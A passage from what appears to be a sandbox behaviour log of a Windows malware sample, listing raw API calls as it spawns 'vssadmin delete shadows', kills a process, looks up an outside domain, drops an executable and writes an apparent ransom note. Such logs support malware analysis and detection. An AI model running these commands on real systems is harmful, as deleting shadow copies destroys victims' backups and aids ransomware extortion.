lpCommandLine="\"cmd.exe\" /c message.html", lpProcessInformation=0x31459b8*(hProcess=0x44c, hThread=0x3a0, dwProcessId=0x1f4, dwThreadId=0x2c8)) returned 1 [0180.989] CloseHandle (hObject=0x428) returned 1 [0180.989] CloseHandle (hObject=0x43c) returned 1 [0180.990] GetFileType (hFile=0x440) returned 0x3 [0180.991] GetFileType (hFile=0x448) returned 0x3 [0180.992] CloseHandle (hObject=0x3a0) returned 1 [0180.997] CoWaitForMultipleHandles (dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x15711a8*=0x170, lpdwindex=0x12fedf4) Thread: id = 2 os_tid = 0x1228 Thread: id = 3 os_tid = 0x12f4 Thread: id = 4 os_tid = 0x12c8 [0136.771] CoGetContextToken (in: pToken=0x522f4b4 | out: pToken=0x522f4b4) returned 0x800401f0 [0136.771] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0136.771] RoInitialize () returned 0x1 [0136.771] RoUninitialize () returned 0x0 Thread: id = 5 os_tid = 0x1038 Thread: id = 6 os_tid = 0x1210 Thread: id = 7 os_tid = 0x104c [0159.446] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0159.447] RoInitialize () returned 0x1 [0159.447] RoUninitialize () returned 0x0 [0159.825] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0159.833] CreatePipe (in: hReadPipe=0x5a2f374, hWritePipe=0x5a2f370, lpPipeAttributes=0x5a2f2f4, nSize=0x0 | out: hReadPipe=0x5a2f374*=0x39c, hWritePipe=0x5a2f370*=0x3a0) returned 1 [0159.841] GetCurrentProcess () returned 0xffffffff [0159.841] GetCurrentProcess () returned 0xffffffff [0159.843] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a2f378, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a2f378*=0x3a4) returned 1 [0159.843] CloseHandle (hObject=0x39c) returned 1 [0159.843] CreatePipe (in: hReadPipe=0x5a2f374, hWritePipe=0x5a2f370, lpPipeAttributes=0x5a2f2f4, nSize=0x0 | out: hReadPipe=0x5a2f374*=0x39c, hWritePipe=0x5a2f370*=0x3a8) returned 1 [0159.844] GetCurrentProcess () returned 0xffffffff [0159.844] GetCurrentProcess () returned 0xffffffff [0159.844] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a2f378, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a2f378*=0x3ac) returned 1 [0159.844] CloseHandle (hObject=0x39c) returned 1 [0159.847] CoTaskMemAlloc (cb=0x20e) returned 0x15d5720 [0159.847] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x15d5720 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0159.847] CoTaskMemFree (pv=0x15d5720) [0159.849] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"nslookup.exe\" hunter.teamwork.cn", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x5a2f2b8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3a0, hStdError=0x3a8), lpProcessInformation=0x31143d4 | out: lpCommandLine="\"nslookup.exe\" hunter.teamwork.cn", lpProcessInformation=0x31143d4*(hProcess=0x3dc, hThread=0x3d8, dwProcessId=0x1360, dwThreadId=0x1284)) returned 1 [0160.397] CloseHandle (hObject=0x3a0) returned 1 [0160.397] CloseHandle (hObject=0x3a8) returned 1 [0160.883] GetFileType (hFile=0x3a4) returned 0x3 [0160.886] GetFileType (hFile=0x3ac) returned 0x3 [0160.888] CloseHandle (hObject=0x3d8) returned 1 [0160.890] GetCurrentProcess () returned 0xffffffff [0160.890] GetCurrentProcess () returned 0xffffffff [0160.891] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a2f434, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a2f434*=0x3d8) returned 1 [0189.382] CloseHandle (hObject=0x3d8) returned 1 [0189.385] ReadFile (in: hFile=0x3a4, lpBuffer=0x3118b24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a2f454, lpOverlapped=0x0 | out: lpBuffer=0x3118b24*, lpNumberOfBytesRead=0x5a2f454*=0x2b, lpOverlapped=0x0) returned 1 [0189.386] ReadFile (in: hFile=0x3a4, lpBuffer=0x3118b24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a2f454, lpOverlapped=0x0 | out: lpBuffer=0x3118b24, lpNumberOfBytesRead=0x5a2f454*=0x0, lpOverlapped=0x0) returned 0 [0189.386] ReadFile (in: hFile=0x3ac, lpBuffer=0x311bbe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a2f454, lpOverlapped=0x0 | out: lpBuffer=0x311bbe0*, lpNumberOfBytesRead=0x5a2f454*=0x41, lpOverlapped=0x0) returned 1 [0189.386] ReadFile (in: hFile=0x3ac, lpBuffer=0x311bbe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a2f454, lpOverlapped=0x0 | out: lpBuffer=0x311bbe0, lpNumberOfBytesRead=0x5a2f454*=0x0, lpOverlapped=0x0) returned 0 [0189.387] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x5a2eec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0189.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a2f374) returned 1 [0189.387] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x5a2f3f0 | out: lpFileInformation=0x5a2f3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6fbdb0ff, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x433)) returned 1 [0189.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a2f370) returned 1 [0189.388] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x5a2eec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0189.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a2f3c0) returned 1 [0189.389] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x314cf80 | out: lpFileInformation=0x314cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6fbdb0ff, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x433)) returned 1 [0189.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a2f3bc) returned 1 [0189.390] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x5a2eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0189.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a2f2e4) returned 1 [0189.390] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d8 [0189.391] GetFileType (hFile=0x3d8) returned 0x1 [0189.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a2f2e0) returned 1 [0189.391] GetFileType (hFile=0x3d8) returned 0x1 [0189.391] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a2f2b8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x5a2f2b8*=0) returned 0x433 [0189.393] WriteFile (in: hFile=0x3d8, lpBuffer=0x314e730*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x5a2f374, lpOverlapped=0x0 | out: lpBuffer=0x314e730*, lpNumberOfBytesWritten=0x5a2f374*=0x50, lpOverlapped=0x0) returned 1 [0189.394] CloseHandle (hObject=0x3d8) returned 1 [0189.729] CoUninitialize () Thread: id = 8 os_tid = 0x1060 [0159.589] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0159.589] RoInitialize () returned 0x1 [0159.590] RoUninitialize () returned 0x0 [0160.401] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0160.401] CreatePipe (in: hReadPipe=0x5b2f5f4, hWritePipe=0x5b2f5f0, lpPipeAttributes=0x5b2f574, nSize=0x0 | out: hReadPipe=0x5b2f5f4*=0x3a8, hWritePipe=0x5b2f5f0*=0x3a0) returned 1 [0160.402] GetCurrentProcess () returned 0xffffffff [0160.402] GetCurrentProcess () returned 0xffffffff [0160.402] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5b2f5f8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5b2f5f8*=0x3e4) returned 1 [0160.402] CloseHandle (hObject=0x3a8) returned 1 [0160.402] CreatePipe (in: hReadPipe=0x5b2f5f4, hWritePipe=0x5b2f5f0, lpPipeAttributes=0x5b2f574, nSize=0x0 | out: hReadPipe=0x5b2f5f4*=0x3a8, hWritePipe=0x5b2f5f0*=0x3e0) returned 1 [0160.403] GetCurrentProcess () returned 0xffffffff [0160.403] GetCurrentProcess () returned 0xffffffff [0160.403] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5b2f5f8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5b2f5f8*=0x3fc) returned 1 [0160.403] CloseHandle (hObject=0x3a8) returned 1 [0160.404] CoTaskMemAlloc (cb=0x20e) returned 0x15d6c08 [0160.404] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x15d6c08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0160.405] CoTaskMemFree (pv=0x15d6c08) [0160.405] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM svchosts.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x5b2f53c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3a0, hStdError=0x3e0), lpProcessInformation=0x3114d14 | out: lpCommandLine="\"taskkill.exe\" /IM svchosts.exe", lpProcessInformation=0x3114d14*(hProcess=0x424, hThread=0x3f4, dwProcessId=0x135c, dwThreadId=0x129c)) returned 1 [0161.012] CloseHandle (hObject=0x3a0) returned 1 [0161.012] CloseHandle (hObject=0x3e0) returned 1 [0161.020] GetFileType (hFile=0x3e4) returned 0x3 [0161.083] GetFileType (hFile=0x3fc) returned 0x3 [0161.085] CloseHandle (hObject=0x3f4) returned 1 [0161.085] GetCurrentProcess () returned 0xffffffff [0161.085] GetCurrentProcess () returned 0xffffffff [0161.085] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x424, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5b2f6b4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5b2f6b4*=0x3f4) returned 1 [0209.312] CloseHandle (hObject=0x3f4) returned 1 [0209.313] ReadFile (in: hFile=0x3e4, lpBuffer=0x311f954, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5b2f6d4, lpOverlapped=0x0 | out: lpBuffer=0x311f954, lpNumberOfBytesRead=0x5b2f6d4*=0x0, lpOverlapped=0x0) returned 0 [0209.313] ReadFile (in: hFile=0x3fc, lpBuffer=0x3122a10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5b2f6d4, lpOverlapped=0x0 | out: lpBuffer=0x3122a10*, lpNumberOfBytesRead=0x5b2f6d4*=0x2e, lpOverlapped=0x0) returned 1 [0209.313] ReadFile (in: hFile=0x3fc, lpBuffer=0x3122a10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5b2f6d4, lpOverlapped=0x0 | out: lpBuffer=0x3122a10, lpNumberOfBytesRead=0x5b2f6d4*=0x0, lpOverlapped=0x0) returned 0 [0209.314] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x5b2f140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0209.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5b2f5f4) returned 1 [0209.314] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x5b2f670 | out: lpFileInformation=0x5b2f670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x80166db7, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x4da)) returned 1 [0209.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5b2f5f0) returned 1 [0209.314] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x5b2f140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0209.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5b2f640) returned 1 [0209.315] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x3174778 | out: lpFileInformation=0x3174778*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x80166db7, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x4da)) returned 1 [0209.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5b2f63c) returned 1 [0209.315] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x5b2f020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0209.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5b2f564) returned 1 [0209.315] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3f4 [0209.316] GetFileType (hFile=0x3f4) returned 0x1 [0209.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5b2f560) returned 1 [0209.316] GetFileType (hFile=0x3f4) returned 0x1 [0209.316] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x5b2f538*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x5b2f538*=0) returned 0x4da [0209.317] WriteFile (in: hFile=0x3f4, lpBuffer=0x3175f20*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x5b2f5f4, lpOverlapped=0x0 | out: lpBuffer=0x3175f20*, lpNumberOfBytesWritten=0x5b2f5f4*=0x4e, lpOverlapped=0x0) returned 1 [0209.317] CloseHandle (hObject=0x3f4) returned 1 [0209.320] CoUninitialize () Thread: id = 9 os_tid = 0x1088 [0159.760] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0159.760] RoInitialize () returned 0x1 [0159.760] RoUninitialize () returned 0x0 [0161.013] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0161.013] CreatePipe (in: hReadPipe=0x5c2ee94, hWritePipe=0x5c2ee90, lpPipeAttributes=0x5c2ee14, nSize=0x0 | out: hReadPipe=0x5c2ee94*=0x3e0, hWritePipe=0x5c2ee90*=0x3a0) returned 1 [0161.014] GetCurrentProcess () returned 0xffffffff [0161.014] GetCurrentProcess () returned 0xffffffff [0161.014] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5c2ee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5c2ee98*=0x42c) returned 1 [0161.015] CloseHandle (hObject=0x3e0) returned 1 [0161.015] CreatePipe (in: hReadPipe=0x5c2ee94, hWritePipe=0x5c2ee90, lpPipeAttributes=0x5c2ee14, nSize=0x0 | out: hReadPipe=0x5c2ee94*=0x3e0, hWritePipe=0x5c2ee90*=0x428) returned 1 [0161.015] GetCurrentProcess () returned 0xffffffff [0161.015] GetCurrentProcess () returned 0xffffffff [0161.016] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5c2ee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5c2ee98*=0x434) returned 1 [0161.016] CloseHandle (hObject=0x3e0) returned 1 [0161.017] CoTaskMemAlloc (cb=0x20e) returned 0x15d6c08 [0161.017] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x15d6c08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0161.017] CoTaskMemFree (pv=0x15d6c08) [0161.017] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /c vssadmin.exe delete shadows", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x5c2edcc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3a0, hStdError=0x428), lpProcessInformation=0x3115048 | out: lpCommandLine="\"cmd.exe\" /c vssadmin.exe delete shadows", lpProcessInformation=0x3115048*(hProcess=0x438, hThread=0x3e0, dwProcessId=0x1280, dwThreadId=0x109c)) returned 1 [0162.578] CloseHandle (hObject=0x3a0) returned 1 [0162.578] CloseHandle (hObject=0x428) returned 1 [0162.579] GetFileType (hFile=0x42c) returned 0x3 [0162.580] GetFileType (hFile=0x434) returned 0x3 [0162.580] CloseHandle (hObject=0x3e0) returned 1 [0162.581] GetCurrentProcess () returned 0xffffffff [0162.581] GetCurrentProcess () returned 0xffffffff [0162.581] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x438, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5c2ef54, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5c2ef54*=0x3e0) returned 1 [0207.582] CloseHandle (hObject=0x3e0) returned 1 [0207.584] ReadFile (in: hFile=0x42c, lpBuffer=0x3128f6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5c2ef74, lpOverlapped=0x0 | out: lpBuffer=0x3128f6c*, lpNumberOfBytesRead=0x5c2ef74*=0x432, lpOverlapped=0x0) returned 1 [0207.587] ReadFile (in: hFile=0x42c, lpBuffer=0x3128f6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5c2ef74, lpOverlapped=0x0 | out: lpBuffer=0x3128f6c, lpNumberOfBytesRead=0x5c2ef74*=0x0, lpOverlapped=0x0) returned 0 [0207.588] ReadFile (in: hFile=0x434, lpBuffer=0x312c028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5c2ef74, lpOverlapped=0x0 | out: lpBuffer=0x312c028, lpNumberOfBytesRead=0x5c2ef74*=0x0, lpOverlapped=0x0) returned 0 [0207.589] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x5c2e9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0207.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5c2ee94) returned 1 [0207.590] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x5c2ef10 | out: lpFileInformation=0x5c2ef10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x753c8294, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x483)) returned 1 [0207.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5c2ee90) returned 1 [0207.591] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x5c2e9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0207.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5c2eee0) returned 1 [0207.592] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x3171d28 | out: lpFileInformation=0x3171d28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x753c8294, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x483)) returned 1 [0207.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5c2eedc) returned 1 [0207.592] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x5c2e8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0207.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5c2ee04) returned 1 [0207.593] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3e0 [0207.593] GetFileType (hFile=0x3e0) returned 0x1 [0207.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5c2ee00) returned 1 [0207.594] GetFileType (hFile=0x3e0) returned 0x1 [0207.595] SetFilePointer (in: hFile=0x3e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x5c2edd8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x5c2edd8*=0) returned 0x483 [0207.599] WriteFile (in: hFile=0x3e0, lpBuffer=0x31734f4*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x5c2ee94, lpOverlapped=0x0 | out: lpBuffer=0x31734f4*, lpNumberOfBytesWritten=0x5c2ee94*=0x57, lpOverlapped=0x0) returned 1 [0207.600] CloseHandle (hObject=0x3e0) returned 1 [0207.607] CoUninitialize () Thread: id = 10 os_tid = 0x12a8 [0160.028] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0160.029] RoInitialize () returned 0x1 [0160.029] RoUninitialize () returned 0x0 [0160.925] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati6482.exe.config", nBufferLength=0x105, lpBuffer=0x5d6eb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati6482.exe.config", lpFilePart=0x0) returned 0x2c [0160.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5d6eff4) returned 1 [0160.925] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati6482.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati6482.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x5d6f070 | out: lpFileInformation=0x5d6f070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0160.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5d6eff0) returned 1 [0195.183] GetFullPathNameW (in: lpFileName="qq3d1t429055.exe", nBufferLength=0x105, lpBuffer=0x5d6ec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\qq3d1t429055.exe", lpFilePart=0x0) returned 0x28 [0195.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5d6f1a8) returned 1 [0195.183] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\qq3d1t429055.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\qq3d1t429055.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x430 [0195.185] GetFileType (hFile=0x430) returned 0x1 [0195.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5d6f1a4) returned 1 [0195.185] GetFileType (hFile=0x430) returned 0x1 [0195.185] WriteFile (in: hFile=0x430, lpBuffer=0x3155800*, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x5d6f258, lpOverlapped=0x0 | out: lpBuffer=0x3155800*, lpNumberOfBytesWritten=0x5d6f258*=0x4600, lpOverlapped=0x0) returned 1 [0195.190] CloseHandle (hObject=0x430) returned 1 [0195.210] GetFullPathNameW (in: lpFileName="message.html", nBufferLength=0x105, lpBuffer=0x5d6ec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\message.html", lpFilePart=0x0) returned 0x24 [0195.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5d6f1a8) returned 1 [0195.210] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\message.html" (normalized: "c:\\users\\fd1hvy\\desktop\\message.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x430 [0195.211] GetFileType (hFile=0x430) returned 0x1 [0195.211] 